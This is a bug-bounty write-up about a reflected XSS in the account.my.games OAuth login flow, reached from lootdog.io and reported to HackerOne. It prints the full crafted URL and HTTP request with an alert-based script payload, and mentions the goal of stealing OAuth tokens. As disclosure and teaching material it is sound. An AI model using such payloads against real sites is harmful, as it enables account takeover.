Reflected XSS on a Public Program

Hi all, My name is Naveen J AKA thevillagehacker and this is my very first write-up and I thought I should contribute some resources to the community.

Motivation

I always wanted to be a very good hunter so I decided to start with low-hanging fruits and I chose to find some XSS on any of the Public Program on HackerOne.

I chose my target as https://lootdog.io/ from mailru which had a large scope on HackerOne. After an hour of recon, I found an unintended behavior in the Oauth request so I decided to play around.

Technical Analysis

I intercepted the login request from https://lootdog.io/ and sent it to the repeater and observed the way the Oauth works. The https://lootdog.io/ uses https://account.my.games as an Oauth service when you click login it will redirect you to https://account.my.games and will let you log in if you have a legitimate account. So I decided to check for Reflected XSS or any Open redirect issues to grab the Oauth token to take Over the user's account.

I added an extra parameter at the end of the keyed value on the request as below,

&Set-Cookie: <script>alert(“Hacked By Deathstroke”)</script>

The finally crafted URL will be like as below,

https://account.my.games//oauth2/login/?continue=https%3A%2F%2Faccount.my.games%2Foauth2%2F%3Fredirect_uri%3Dhttps%253A%252F%252Flootdog.io%252Fsocial%252Fcomplete%252Fo2mygames%252F%26client_id%3Dlootdog_io%26response_type%3Dcode%26signup_social%3Dmailru%2Cfb%2Cok%2Cvk%2Cg%2Ctwitch%2Ctw%26signup_method%3Demail%252Cphone%26lang%3DEN&client_id=lootdog_io&lang=EN&signup_method=email%2Cphone&signup_social=mailru%2Cfb%2Cok%2Cvk%2Cg%2Ctwitch%2Ctw&Set-Cookie: <script>alert("Hacked By Deathstroke")</script>

After inserted the payload at the end of the URL sent the request as below and observed the response.

GET /oauth2/login/?continue=https%3A%2F%2Faccount.my.games%2Foauth2%2F%3Fredirect_uri%3Dhttps%253A%252F%252Flootdog.io%252Fsocial%252Fcomplete%252Fo2mygames%252F%26client_id%3Dlootdog_io%26response_type%3Dcode%26signup_social%3Dmailru%2Cfb%2Cok%2Cvk%2Cg%2Ctwitch%2Ctw%26signup_method%3Demail%252Cphone%26lang%3DEN&client_id=lootdog_io&lang=EN&signup_method=email%2Cphone&signup_social=mailru%2Cfb%2Cok%2Cvk%2Cg%2Ctwitch%2Ctw&Set-Cookie: <script>alert("Hacked By Deathstroke")</script> HTTP/1.1 Host: account.my.games 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://lootdog.io/
Connection: close
<script>alert("Hacked By Deathstroke")</script> HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 
X-Frame-Options: SAMEORIGIN
Content-Length: 3982
Vary: Origin

But unfortunately, no access token is reflected on the response at the time. But I reported to the program because the issue may cause some other security threats.

Seems that the payload worked which is reflected on the HTTP response.

It was my first Vulnerability that I found, so I quickly created a report and sent it to HackerOne. The HackerOne analyst verified the vulnerability and triaged the report after some discussions and the issue was resolved and they rewarded me a HOF.

Thanks for Reading …

Follow me on Twitter : thevillagehacker